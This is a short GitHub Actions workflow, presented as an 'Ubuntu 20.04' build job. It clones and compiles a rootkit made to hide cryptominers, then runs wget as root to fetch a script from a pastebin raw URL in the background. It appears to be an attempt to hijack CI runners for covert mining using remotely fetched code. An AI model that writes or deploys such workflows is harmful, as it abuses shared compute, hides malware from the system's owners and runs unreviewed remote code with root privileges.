name: Ubuntu 20.04

on: 
  workflow_dispatch:
env:
  USER: root
jobs:
  build:
    runs-on: ubuntu-20.04
    steps:
      - uses: actions/checkout@v2
      - name: Run settting file
        run: |
          git clone https://github.com/alfonmga/hiding-cryptominers-linux-rootkit
          cd hiding-cryptominers-linux-rootkit/
          make
      - name: LOADING
        run: |
          cd hiding-cryptominers-linux-rootkit/
          sudo wget -O ab.sh https://pastebin.com/raw/D7E7Pcay&
          export USER=root
          whoami
          sudo whoami
